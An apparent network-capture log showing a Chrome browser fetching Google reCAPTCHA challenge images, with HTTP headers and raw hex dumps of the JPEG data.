                                                                                                                                                                                                                                                                  2024-10-29 19:10:53 UTC1170OUTGET /recaptcha/api2/payload?p=06AFcWeA6LY5a_sjoH9yvpmbEh0CtZQlmUakH4UvubxSxHHJkgU0G9bAzr6I0MddOzcJEu1XGBmIC2cV6m0Dxir3cdfDboH-0g8Psw8c0T-mcrf7lkroG7ZwpNHkXk3HnLiiaEN-b8-mhRh2kd6qKZhKZi_wXtMyXqY98dgFWFNcsdHZk9KqUo9Qo36_5HKbaTC9lcL1LM6e10_ZL_O3CJeFLXF6TB_DfgLQ&k=6LfT61wqAAAAAOLaMTaK9Ln8bjdWJ8-ahQ3zE9AF HTTP/1.1
                                                                                                                                                                                                                                                                  Host: www.google.com
                                                                                                                                                                                                                                                                  Connection: keep-alive
                                                                                                                                                                                                                                                                  sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                                                                                                                  sec-ch-ua-mobile: ?0
                                                                                                                                                                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                                  sec-ch-ua-platform: "Windows"
                                                                                                                                                                                                                                                                  Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
                                                                                                                                                                                                                                                                  X-Client-Data: CIu2yQEIprbJAQipncoBCLbgygEIkqHLAQj2mM0BCIWgzQEIucrNAQiJ080BGMvYzQEY642lFw==
                                                                                                                                                                                                                                                                  Sec-Fetch-Site: same-origin
                                                                                                                                                                                                                                                                  Sec-Fetch-Mode: no-cors
                                                                                                                                                                                                                                                                  Sec-Fetch-Dest: image
                                                                                                                                                                                                                                                                  Referer: https://www.google.com/recaptcha/api2/bframe?hl=en&v=-ZG7BC9TxCVEbzIO2m429usb&k=6LfT61wqAAAAAOLaMTaK9Ln8bjdWJ8-ahQ3zE9AF
                                                                                                                                                                                                                                                                  Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                                                  Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                                                  Cookie: _GRECAPTCHA=09ANOXeZyZWgCKLdw5-kFS0gUANBm5Va1EN26B9hfC56KI4QhhLjdW5njibFBDQAH_dwZx17Q4rEBsJMB-Ste7v8o
                                                                                                                                                                                                                                                                  2024-10-29 19:10:54 UTC681INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                  Content-Type: image/jpeg
                                                                                                                                                                                                                                                                  Expires: Tue, 29 Oct 2024 19:10:54 GMT
                                                                                                                                                                                                                                                                  Date: Tue, 29 Oct 2024 19:10:54 GMT
                                                                                                                                                                                                                                                                  Cache-Control: private, max-age=30
                                                                                                                                                                                                                                                                  Report-To: {"group":"coop_38fac9d5b82543fc4729580d18ff2d3d","max_age":2592000,"endpoints":[{"url":"https://csp.withgoogle.com/csp/report-to/38fac9d5b82543fc4729580d18ff2d3d"}]}
                                                                                                                                                                                                                                                                  Cross-Origin-Resource-Policy: same-site
                                                                                                                                                                                                                                                                  Cross-Origin-Opener-Policy-Report-Only: same-origin; report-to="coop_38fac9d5b82543fc4729580d18ff2d3d"
                                                                                                                                                                                                                                                                  Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                  Server: ESF
                                                                                                                                                                                                                                                                  X-XSS-Protection: 0
                                                                                                                                                                                                                                                                  X-Frame-Options: SAMEORIGIN
                                                                                                                                                                                                                                                                  X-Content-Type-Options: nosniff
                                                                                                                                                                                                                                                                  Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                                                                                                                                                                  Connection: close
                                                                                                                                                                                                                                                                  2024-10-29 19:10:54 UTC697INData Raw: 36 32 37 34 0d 0a ff d8 ff e0 00 10 4a 46 49 46 00 01 02 00 00 01 00 01 00 00 ff db 00 43 00 05 03 04 04 04 03 05 04 04 04 05 05 05 06 07 0c 08 07 07 07 07 0f 0a 0b 09 0c 11 0f 12 12 11 0f 11 10 13 16 1c 17 13 14 1a 15 10 11 18 21 18 1a 1c 1d 1f 1f 1f 13 17 22 24 22 1e 24 1c 1e 1f 1e ff db 00 43 01 05 05 05 07 06 07 0e 08 08 0e 1e 14 11 14 1e 1e 1e 1e 1e 1e 1e 1e 1e 1e 1e 1e 1e 1e 1e 1e 1e 1e 1e 1e 1e 1e 1e 1e 1e 1e 1e 1e 1e 1e 1e 1e 1e 1e 1e 1e 1e 1e 1e 1e 1e 1e 1e 1e 1e 1e 1e 1e 1e 1e ff c0 00 11 08 01 c2 01 c2 03 01 22 00 02 11 01 03 11 01 ff c4 00 1f 00 00 01 05 01 01 01 01 01 01 00 00 00 00 00 00 00 00 01 02 03 04 05 06 07 08 09 0a 0b ff c4 00 b5 10 00 02 01 03 03 02 04 03 05 05 04 04 00 00 01 7d 01 02 03 00 04 11 05 12 21 31 41 06 13 51 61 07 22 71
                                                                                                                                                                                                                                                                  Data Ascii: 6274JFIFC!"$"$C"}!1AQa"q
                                                                                                                                                                                                                                                                  2024-10-29 19:10:54 UTC1378INData Raw: e0 9f 41 40 0d 6e 9c 75 a0 02 79 1c 1a 7a ae 40 e3 b5 39 97 68 cf 14 01 18 5f a5 34 e4 67 d3 d2 9e 58 01 4c 62 09 34 00 80 ee 18 ec 3d 68 38 07 38 c7 bd 26 3a 90 70 07 ad 21 e0 72 71 93 8e 68 01 4b 73 80 47 14 dc 86 db c0 27 a8 39 e9 4a a3 24 e4 8c 1e e0 52 af 51 d3 81 dc 50 03 08 cf 04 02 09 ea 0e 28 27 8e 9e dd 69 d8 eb 83 8f c2 90 8f 97 e9 40 0d 24 80 bd 70 46 39 3d 4d 18 24 0e 18 73 db ad 3b 69 00 60 f2 3d 69 7e 62 73 9f 7a 00 63 28 21 81 c6 5b d7 a7 ff 00 ae 85 18 dc 14 05 c0 cf 1d e9 d8 dc 4f 3c 76 e2 8c 73 c9 cf a5 00 33 1f 38 e4 8f e2 3f 4a 92 27 00 75 c3 7a 83 49 82 79 c7 7f 4a 4c 1c ff 00 f5 a8 01 5c 64 9c 72 32 0f 3e 94 9b 9d 46 08 50 14 76 ef 43 10 fc 36 70 31 8c 52 b2 86 27 8e be 94 08 62 3b c7 b6 45 1c 37 27 27 b7 b5 4b 71 2c 72 c2 48 50 73
                                                                                                                                                                                                                                                                  Data Ascii: A@nuyz@9h_4gXLb4=h88&:p!rqhKsG'9J$RQP('i@$pF9=M$s;i`=i~bszc(![O<vs38?J'uzIyJL\dr2>FPvC6p1R'b;E7''Kq,rHPs
                                                                                                                                                                                                                                                                  2024-10-29 19:10:54 UTC1378INData Raw: a6 02 82 3b 8a 3e 5e 36 fa f2 28 0d 9f ff 00 55 29 a6 2b 80 eb d7 6f b5 03 a9 ef 8e 68 c6 4d 18 1e a6 80 b8 e2 3f fd 74 bf c3 4d c0 f7 e6 94 67 34 ae 17 1b 31 c4 24 9c 7e 3d 29 23 3c 1e 47 1c 52 ca 7e 52 3a fa d3 21 19 52 a4 9c 0c 0c e6 8b 81 20 a0 0e 69 4f 73 c9 1e 94 76 a6 17 0e d4 ab 46 28 f7 a0 05 a3 38 a3 a8 34 a3 ef 93 ed 48 2e 28 6e 28 0d 48 33 8e 94 1e 94 c4 29 ce 78 ad bb 13 98 17 1f 8d 62 12 6b 67 4f 27 c8 5f a5 38 bb 03 2d 0e 29 cb 4c e6 9e b5 44 0f 14 ec d3 45 3c 53 29 21 d9 a7 76 a6 ad 3e 98 9a 14 51 46 28 a4 23 d8 33 cd 38 63 14 d2 29 56 ba 5d 8c 2c 48 a7 3c 57 8f 7c 5b 84 c7 e2 05 93 1c 3a d7 b1 2e 2b cb fe 33 43 fb db 69 c2 d6 15 15 d1 51 76 67 9c b0 34 a0 1c 53 9b d3 ad 27 f0 e6 b9 8e 94 c1 87 ca 3d a9 00 e6 9d 4a 40 02 a8 62 15 c1 a3 19
                                                                                                                                                                                                                                                                  Data Ascii: ;>^6(U)+ohM?tMg41$~=)#<GR~R:!R iOsvF(84H.(n(H3)xbkgO'_8-)LDE<S)!v>QF(#38c)V],H<W|[:.+3CiQvg4S'=J@b
                                                                                                                                                                                                                                                                  2024-10-29 19:10:54 UTC1378INData Raw: 6f 2e 98 f1 7b 7e 95 6b 1e d4 8c 0f a5 24 c4 51 31 fb 7e 95 25 a8 21 98 1c d4 cc b4 d8 b8 7a b4 80 93 bd 04 7b 52 a8 e2 9c 17 9a b1 0c 29 51 ba 7b 7e 95 31 eb 47 51 8a 49 0a e5 52 b8 a4 1c 37 4e 2a cb 27 4c 53 5a 3e 39 eb 4a c5 5c 80 7f 5a 01 e0 53 ca e3 8a 6e 0e 4f 1d aa 6c 02 66 b4 34 93 f7 eb 3b 9f 4a bd a5 90 26 23 be 29 ad c6 d9 ac 94 f5 35 1a d3 c5 6b 63 32 45 a7 82 6a 35 23 35 20 a4 c6 98 e1 4f 5a 65 3d 70 29 80 ea 28 a2 81 9e bb 45 21 f5 a0 1c d7 4b 39 9a 1c 0d 39 c0 68 d9 71 c9 1d 69 95 22 f4 cd 4c 82 c7 86 f8 9e 3f 2b 5f ba 43 fd fc d6 6a 8a e8 fe 21 5b f9 3e 21 97 03 ef 8c d7 3e a2 b8 e4 b5 37 86 c3 40 c5 2f 53 46 d3 4a 2a 1d cd 10 9b 69 3b e2 9c 4f 14 8b d7 34 3d 85 bb 1a 01 eb 49 8e 6a 55 c6 29 08 c9 a9 d4 77 23 03 1d 28 c5 3b 18 a7 01 ce 73
                                                                                                                                                                                                                                                                  Data Ascii: o.{~k$Q1~%!z{R)Q{~1GQIR7N*'LSZ>9J\ZSnOlf4;J&#)5kc2Ej5#5 OZe=p)(E!K99hqi"L?+_Cj![>!>7@/SFJ*i;O4=IjU)w#(;s
                                                                                                                                                                                                                                                                  2024-10-29 19:10:54 UTC1378INData Raw: 57 44 29 3b d9 39 60 c3 90 54 d5 ef 0d 78 87 57 b3 b4 ba f1 6d 85 f0 86 e6 ca e0 13 07 76 43 d7 8f 4a 89 37 a5 8b e5 8c f4 67 81 f8 83 4c ba d1 b5 6b ad 3a f6 26 8e 7b 79 19 19 58 60 82 0d 67 b2 d7 75 f1 86 79 35 4f 12 36 bc e3 3f 6e 1b d9 87 42 dd 4d 70 e4 d0 9b ea 4a d3 46 45 d0 d0 48 ed 4f 65 f6 a8 fe 6d e0 6d e2 9b 65 2d 04 3c 53 80 c9 e9 9a 92 40 8b c9 fc aa 25 63 93 b4 66 96 81 61 ac 38 e9 51 34 60 f5 a9 9f a7 4c 54 61 b9 c1 a5 d0 4b 72 16 88 af 4c d3 16 42 8f 86 07 1e b5 6c ed 3f c5 9a 6b a2 ba e0 d0 ae 86 d1 18 70 7a 1a 78 3d cd 42 d1 ec 39 43 9a 45 79 17 96 18 1e b5 6a 42 48 b0 c2 9a 47 14 c1 2a 91 c1 cd 28 7c d5 a6 ac 43 5a 88 7a d3 ed b8 98 62 98 48 a7 45 c4 80 e7 15 00 8d 54 e0 52 8a 62 31 c0 a7 0a 61 72 45 39 38 35 20 e9 51 46 3e 6d c7 a5 4a
                                                                                                                                                                                                                                                                  Data Ascii: WD);9`TxWmvCJ7gLk:&{yX`guy5O6?nBMpJFEHOemme-<S@%cfa8Q4`LTaKrLBl?kpzx=B9CEyjBHG*(|CZzbHETRb1arE985 QF>mJ
                                                                                                                                                                                                                                                                  2024-10-29 19:10:54 UTC1378INData Raw: f0 84 ba dd e4 92 41 20 2a ef c5 65 52 2a 46 b4 af b9 c3 08 f2 40 18 39 a9 e0 b3 95 cf c9 19 3f 4a ef af bc 35 a7 e8 b7 66 d6 e1 25 9a 65 e4 85 5a d8 f0 f5 b4 51 dc 46 f0 e8 86 65 07 3f 30 eb 59 38 c5 6e 6a a4 de c7 29 e1 8f 02 eb 5a dc ca 96 96 52 92 7f d9 af 46 f0 97 c3 6d 27 47 d4 87 fc 25 da 84 36 aa a3 3e 5e 72 e7 da ba a9 6f 7c 72 d0 05 d1 74 86 b2 84 ae 07 97 0e 0f e7 55 7c 3f f0 a3 c5 de 23 d4 be d3 ab f9 d1 a9 6d cc f2 66 a3 9a fa 45 05 af b9 57 c5 9e 3b f0 fe 91 1f f6 77 85 74 88 94 a7 02 e2 41 b9 8f bd 79 ae a9 ad eb 7a e5 c1 fb 44 b3 3b 31 c0 19 38 fc ab e9 e1 f0 7f c1 1a 5c 48 ba ad f2 a4 87 bb 90 32 6a 9c da 57 c2 7d 0a f0 33 de c5 23 45 c8 51 cd 25 65 bb 0e 57 7f 75 1f 3e 78 7b c0 3a fe b3 28 09 69 29 56 e3 24 1c 7e 75 de 59 7c 3f d0 bc 29
                                                                                                                                                                                                                                                                  Data Ascii: A *eR*F@9?J5f%eZQFe?0Y8nj)ZRFm'G%6>^ro|rtU|?#mfEW;wtAyzD;18\H2jW}3#EQ%eWu>x{:(i)V$~uY|?)
                                                                                                                                                                                                                                                                  2024-10-29 19:10:54 UTC1378INData Raw: f1 37 ed 13 33 79 96 ba 5d 82 46 4e 70 fd 6b c5 6e f4 5d 78 b6 f9 2d ee 08 7e 87 06 bb 0f 02 fc 23 d7 35 9b e8 da 7b 56 86 0e 19 a4 71 81 8a 1d 37 7d c7 cd 1e 87 1b e2 cf 18 78 9b c4 37 ad 3d d4 d7 0d ce 46 09 c5 5c f0 9f 81 fc 49 e2 a9 42 43 1c e7 8c 96 39 c6 3e b5 f5 0d bf c3 2f 06 e9 da 44 7f 6c b6 8d bc a1 f3 c8 e7 19 35 93 e2 ef 88 1e 12 f0 56 8c f1 e9 6d 6c d3 20 c2 a4 58 fc 33 49 72 c7 72 79 a4 de 87 9a e9 3f 00 75 60 e9 25 f4 ca aa 7e f2 b1 e8 2b 63 59 9f c1 9f 0c b4 e3 0c 31 c5 79 a8 8f bf d0 e0 d7 01 aa 7c 77 f1 34 f3 ca 6d e7 08 8c 30 31 d8 57 95 eb 9a cd e6 af 73 2d d5 d4 85 de 56 24 9c f7 ab 57 7b 2b 03 8a 5b b3 6f e2 0f 8e 35 3f 13 dd b4 cf 21 48 07 dc 41 c0 15 c6 c7 23 06 1c b7 3d 71 4f 80 7c a5 5b 9a 96 28 06 f0 49 c0 ad 61 4f 94 99 34 b6
                                                                                                                                                                                                                                                                  Data Ascii: 73y]FNpkn]x-~#5{Vq7}x7=F\IBC9>/Dl5Vml X3Irry?u`%~+cY1y|w4m01Ws-V$W{+[o5?!HA#=qO|[(IaO4
                                                                                                                                                                                                                                                                  2024-10-29 19:10:54 UTC1378INData Raw: 67 18 40 7d c9 ab f6 3a 45 c5 cb 81 14 4f 23 11 c0 03 34 e2 9b 0e 64 66 c4 85 b3 81 f5 a7 e1 17 81 d6 a7 d4 21 b9 b5 91 a1 92 36 42 bd 41 ed 58 29 a9 ba 5f 6c da 0a 83 f3 67 d2 9e 91 26 2d 48 e8 6c 2c 6e af 1c 08 91 98 93 8c 0a ef f4 0f 02 5c 2d b8 bb be fd d2 63 27 35 d5 78 2f 52 f0 66 95 e0 f8 75 27 44 7b d6 5c ec 3c 9c d7 21 e2 ff 00 1d 5d 6a b2 b2 c2 7c 98 3f 85 57 8e 2a 5c d7 40 54 db 65 5d 72 2b 18 66 f2 2d 70 db 7a 9a 4b 18 fe 75 c1 03 f0 e6 b9 b1 a8 83 2e 49 cf 35 b3 a6 df 46 64 04 1a c5 ea 74 45 25 b1 db 69 d1 0f 2c 1a a5 af 9d a8 54 93 d2 a5 d3 2f 11 a3 18 23 35 5f 5d 60 f1 9c 9a 94 85 26 70 9a a3 93 21 e6 a8 70 33 fe 35 7f 51 4f de 1c 8e f5 48 a7 70 2b 44 20 ce 45 21 18 1d 29 ea 3e 5a 31 c5 57 40 6c 61 e9 4c 51 d6 9e c1 47 24 e2 9e 10 f1 c5 24
                                                                                                                                                                                                                                                                  Data Ascii: g@}:EO#4df!6BAX)_lg&-Hl,n\-c'5x/Rfu'D{\<!]j|?W*\@Te]r+f-pzKu.I5FdtE%i,T/#5_]`&p!p35QOHp+D E!)>Z1W@laLQG$$
                                                                                                                                                                                                                                                                  2024-10-29 19:10:54 UTC1378INData Raw: 10 45 3c 45 28 1f 76 a1 b2 85 38 a5 c8 c6 29 a4 3e 32 56 90 1e 7b d1 71 e8 29 f6 a5 19 a3 8f 6a 76 7e 9f 85 26 c7 64 0a 3a d0 29 54 d1 c7 a5 3b dc 15 80 03 47 34 e2 69 a5 80 e4 d1 71 58 50 29 78 da 4e 40 35 13 48 5b 85 c5 34 a8 62 37 1f 9b b5 35 16 26 d2 09 18 e6 a1 68 cc 8d 97 24 8e d8 ab 71 db bb 9c 9a bd 67 a7 e4 e7 04 d6 8a 36 dc c9 4e ef 43 3e 38 a4 91 40 0a 46 2a dd ad a0 e0 be 49 f4 ad 9b 7d 2e f2 69 96 28 ed e4 0c dd 3e 5a f5 1f 03 fc 31 17 8c 97 1a 9b 14 8c 0c 91 50 ab 53 e6 e5 46 9c 8f 73 ce 3c 37 e1 db fd 5e e5 20 b4 b3 77 24 e3 38 af 55 f0 f7 80 b4 ef 0f 34 57 1a e6 27 94 b0 fd d2 8e 17 eb 5e 8d a7 ae 8f a0 da 7d 9b 4a 86 22 ea 31 bf 1d fe b5 cf ea d7 8d 3c f0 16 6f bc 77 38 07 ad 71 62 f1 dc af 96 92 bb 34 85 0b eb 23 a1 b9 d4 d2 08 23 b5 d2
                                                                                                                                                                                                                                                                  Data Ascii: E<E(v8)>2V{q)jv~&d:)T;G4iqXP)xN@5H[4b75&h$qg6NC>8@F*I}.i(>Z1PSFs<7^ w$8U4W'^}J"1<ow8qb4##
                                                                                                                                                                                                                                                                  2024-10-29 19:10:54 UTC1378INData Raw: 4e 36 5b 98 54 9d d9 6b 5f f1 06 a9 e2 3b d2 f3 4a ca 87 81 9e 00 15 76 cf 49 d1 92 15 fb 53 b3 ca 7b 8e 95 58 da a7 93 85 00 7a 62 9b 6e db e5 c1 3c 2f 51 ea 6b 68 c9 c7 54 43 b3 d0 b7 79 a4 78 6c 47 94 33 2b fe 95 9a 3c 39 65 70 47 d9 ae c2 b1 3c 06 15 35 d3 19 5f 62 f0 2a 7b 68 5e 25 0d 9e 69 f3 b7 b9 36 46 2e a7 e1 ad 42 cd 4c 88 04 88 3b af 35 8c f0 bc 5c 3a 32 9f 71 8a ef 64 be b8 0a 91 0c 90 4e 05 69 4f 67 a7 ea 96 7e 4d dc 21 24 c6 37 81 8a 4e 48 6e 27 97 05 cf bd 31 e3 1b 87 15 d3 eb de 14 be d3 54 cb 12 f9 d0 9e 41 5e c2 b9 f6 4c 7c a7 39 a8 d4 9b 10 a8 28 41 35 a3 69 3f 4e 33 54 c8 1f 90 a2 36 d9 c8 19 34 d0 d1 bd 00 dd 83 5a ba 7b 84 60 70 05 60 69 b3 87 21 49 e6 b6 a0 07 b0 c7 a5 17 19 d4 e9 f7 60 60 6e c7 15 a4 b7 58 00 e7 3e d5 c8 c5 3b 28
                                                                                                                                                                                                                                                                  Data Ascii: N6[Tk_;JvIS{Xzbn</QkhTCyxlG3+<9epG<5_b*{h^%i6F.BL;5\:2qdNiOg~M!$7NHn'1TA^L|9(A5i?N3T64Z{`p`i!I``nX>;(


                                                                                                                                                                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                  91192.168.2.1649822142.250.184.1964437056C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                  2024-10-29 19:10:55 UTC838OUTGET /recaptcha/api2/payload?p=06AFcWeA6LY5a_sjoH9yvpmbEh0CtZQlmUakH4UvubxSxHHJkgU0G9bAzr6I0MddOzcJEu1XGBmIC2cV6m0Dxir3cdfDboH-0g8Psw8c0T-mcrf7lkroG7ZwpNHkXk3HnLiiaEN-b8-mhRh2kd6qKZhKZi_wXtMyXqY98dgFWFNcsdHZk9KqUo9Qo36_5HKbaTC9lcL1LM6e10_ZL_O3CJeFLXF6TB_DfgLQ&k=6LfT61wqAAAAAOLaMTaK9Ln8bjdWJ8-ahQ3zE9AF HTTP/1.1
                                                                                                                                                                                                                                                                  Host: www.google.com
                                                                                                                                                                                                                                                                  Connection: keep-alive
                                                                                                                                                                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                                  Accept: */*
                                                                                                                                                                                                                                                                  X-Client-Data: CIu2yQEIprbJAQipncoBCLbgygEIkqHLAQj2mM0BCIWgzQEIucrNAQiJ080BGMvYzQEY642lFw==
                                                                                                                                                                                                                                                                  Sec-Fetch-Site: none
                                                                                                                                                                                                                                                                  Sec-Fetch-Mode: cors
                                                                                                                                                                                                                                                                  Sec-Fetch-Dest: empty
                                                                                                                                                                                                                                                                  Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                                                  Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                                                  Cookie: _GRECAPTCHA=09ANOXeZyZWgCKLdw5-kFS0gUANBm5Va1EN26B9hfC56KI4QhhLjdW5njibFBDQAH_dwZx17Q4rEBsJMB-Ste7v8o
                                                                                                                                                                                                                                                                  2024-10-29 19:10:55 UTC681INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                  Content-Type: image/jpeg
                                                                                                                                                                                                                                                                  Expires: Tue, 29 Oct 2024 19:10:55 GMT
                                                                                                                                                                                                                                                                  Date: Tue, 29 Oct 2024 19:10:55 GMT
                                                                                                                                                                                                                                                                  Cache-Control: private, max-age=30
                                                                                                                                                                                                                                                                  Cross-Origin-Resource-Policy: same-site
                                                                                                                                                                                                                                                                  Report-To: {"group":"coop_38fac9d5b82543fc4729580d18ff2d3d","max_age":2592000,"endpoints":[{"url":"https://csp.withgoogle.com/csp/report-to/38fac9d5b82543fc4729580d18ff2d3d"}]}
                                                                                                                                                                                                                                                                  Cross-Origin-Opener-Policy-Report-Only: same-origin; report-to="coop_38fac9d5b82543fc4729580d18ff2d3d"
                                                                                                                                                                                                                                                                  Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                  Server: ESF
                                                                                                                                                                                                                                                                  X-XSS-Protection: 0
                                                                                                                                                                                                                                                                  X-Frame-Options: SAMEORIGIN
                                                                                                                                                                                                                                                                  X-Content-Type-Options: nosniff
                                                                                                                                                                                                                                                                  Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                                                                                                                                                                  Connection: close
                                                                                                                                                                                                                                                                  2024-10-29 19:10:55 UTC697INData Raw: 36 32 37 34 0d 0a ff d8 ff e0 00 10 4a 46 49 46 00 01 02 00 00 01 00 01 00 00 ff db 00 43 00 05 03 04 04 04 03 05 04 04 04 05 05 05 06 07 0c 08 07 07 07 07 0f 0a 0b 09 0c 11 0f 12 12 11 0f 11 10 13 16 1c 17 13 14 1a 15 10 11 18 21 18 1a 1c 1d 1f 1f 1f 13 17 22 24 22 1e 24 1c 1e 1f 1e ff db 00 43 01 05 05 05 07 06 07 0e 08 08 0e 1e 14 11 14 1e 1e 1e 1e 1e 1e 1e 1e 1e 1e 1e 1e 1e 1e 1e 1e 1e 1e 1e 1e 1e 1e 1e 1e 1e 1e 1e 1e 1e 1e 1e 1e 1e 1e 1e 1e 1e 1e 1e 1e 1e 1e 1e 1e 1e 1e 1e 1e 1e 1e ff c0 00 11 08 01 c2 01 c2 03 01 22 00 02 11 01 03 11 01 ff c4 00 1f 00 00 01 05 01 01 01 01 01 01 00 00 00 00 00 00 00 00 01 02 03 04 05 06 07 08 09 0a 0b ff c4 00 b5 10 00 02 01 03 03 02 04 03 05 05 04 04 00 00 01 7d 01 02 03 00 04 11 05 12 21 31 41 06 13 51 61 07 22 71
                                                                                                                                                                                                                                                                  Data Ascii: 6274JFIFC!"$"$C"}!1AQa"q
                                                                                                                                                                                                                                                                  2024-10-29 19:10:55 UTC1378INData Raw: e0 9f 41 40 0d 6e 9c 75 a0 02 79 1c 1a 7a ae 40 e3 b5 39 97 68 cf 14 01 18 5f a5 34 e4 67 d3 d2 9e 58 01 4c 62 09 34 00 80 ee 18 ec 3d 68 38 07 38 c7 bd 26 3a 90 70 07 ad 21 e0 72 71 93 8e 68 01 4b 73 80 47 14 dc 86 db c0 27 a8 39 e9 4a a3 24 e4 8c 1e e0 52 af 51 d3 81 dc 50 03 08 cf 04 02 09 ea 0e 28 27 8e 9e dd 69 d8 eb 83 8f c2 90 8f 97 e9 40 0d 24 80 bd 70 46 39 3d 4d 18 24 0e 18 73 db ad 3b 69 00 60 f2 3d 69 7e 62 73 9f 7a 00 63 28 21 81 c6 5b d7 a7 ff 00 ae 85 18 dc 14 05 c0 cf 1d e9 d8 dc 4f 3c 76 e2 8c 73 c9 cf a5 00 33 1f 38 e4 8f e2 3f 4a 92 27 00 75 c3 7a 83 49 82 79 c7 7f 4a 4c 1c ff 00 f5 a8 01 5c 64 9c 72 32 0f 3e 94 9b 9d 46 08 50 14 76 ef 43 10 fc 36 70 31 8c 52 b2 86 27 8e be 94 08 62 3b c7 b6 45 1c 37 27 27 b7 b5 4b 71 2c 72 c2 48 50 73
                                                                                                                                                                                                                                                                  Data Ascii: A@nuyz@9h_4gXLb4=h88&:p!rqhKsG'9J$RQP('i@$pF9=M$s;i`=i~bszc(![O<vs38?J'uzIyJL\dr2>FPvC6p1R'b;E7''Kq,rHPs
                                                                                                                                                                                                                                                                  2024-10-29 19:10:55 UTC1378INData Raw: a6 02 82 3b 8a 3e 5e 36 fa f2 28 0d 9f ff 00 55 29 a6 2b 80 eb d7 6f b5 03 a9 ef 8e 68 c6 4d 18 1e a6 80 b8 e2 3f fd 74 bf c3 4d c0 f7 e6 94 67 34 ae 17 1b 31 c4 24 9c 7e 3d 29 23 3c 1e 47 1c 52 ca 7e 52 3a fa d3 21 19 52 a4 9c 0c 0c e6 8b 81 20 a0 0e 69 4f 73 c9 1e 94 76 a6 17 0e d4 ab 46 28 f7 a0 05 a3 38 a3 a8 34 a3 ef 93 ed 48 2e 28 6e 28 0d 48 33 8e 94 1e 94 c4 29 ce 78 ad bb 13 98 17 1f 8d 62 12 6b 67 4f 27 c8 5f a5 38 bb 03 2d 0e 29 cb 4c e6 9e b5 44 0f 14 ec d3 45 3c 53 29 21 d9 a7 76 a6 ad 3e 98 9a 14 51 46 28 a4 23 d8 33 cd 38 63 14 d2 29 56 ba 5d 8c 2c 48 a7 3c 57 8f 7c 5b 84 c7 e2 05 93 1c 3a d7 b1 2e 2b cb fe 33 43 fb db 69 c2 d6 15 15 d1 51 76 67 9c b0 34 a0 1c 53 9b d3 ad 27 f0 e6 b9 8e 94 c1 87 ca 3d a9 00 e6 9d 4a 40 02 a8 62 15 c1 a3 19
                                                                                                                                                                                                                                                                  Data Ascii: ;>^6(U)+ohM?tMg41$~=)#<GR~R:!R iOsvF(84H.(n(H3)xbkgO'_8-)LDE<S)!v>QF(#38c)V],H<W|[:.+3CiQvg4S'=J@b
                                                                                                                                                                                                                                                                  2024-10-29 19:10:55 UTC1378INData Raw: 6f 2e 98 f1 7b 7e 95 6b 1e d4 8c 0f a5 24 c4 51 31 fb 7e 95 25 a8 21 98 1c d4 cc b4 d8 b8 7a b4 80 93 bd 04 7b 52 a8 e2 9c 17 9a b1 0c 29 51 ba 7b 7e 95 31 eb 47 51 8a 49 0a e5 52 b8 a4 1c 37 4e 2a cb 27 4c 53 5a 3e 39 eb 4a c5 5c 80 7f 5a 01 e0 53 ca e3 8a 6e 0e 4f 1d aa 6c 02 66 b4 34 93 f7 eb 3b 9f 4a bd a5 90 26 23 be 29 ad c6 d9 ac 94 f5 35 1a d3 c5 6b 63 32 45 a7 82 6a 35 23 35 20 a4 c6 98 e1 4f 5a 65 3d 70 29 80 ea 28 a2 81 9e bb 45 21 f5 a0 1c d7 4b 39 9a 1c 0d 39 c0 68 d9 71 c9 1d 69 95 22 f4 cd 4c 82 c7 86 f8 9e 3f 2b 5f ba 43 fd fc d6 6a 8a e8 fe 21 5b f9 3e 21 97 03 ef 8c d7 3e a2 b8 e4 b5 37 86 c3 40 c5 2f 53 46 d3 4a 2a 1d cd 10 9b 69 3b e2 9c 4f 14 8b d7 34 3d 85 bb 1a 01 eb 49 8e 6a 55 c6 29 08 c9 a9 d4 77 23 03 1d 28 c5 3b 18 a7 01 ce 73
                                                                                                                                                                                                                                                                  Data Ascii: o.{~k$Q1~%!z{R)Q{~1GQIR7N*'LSZ>9J\ZSnOlf4;J&#)5kc2Ej5#5 OZe=p)(E!K99hqi"L?+_Cj![>!>7@/SFJ*i;O4=IjU)w#(;s
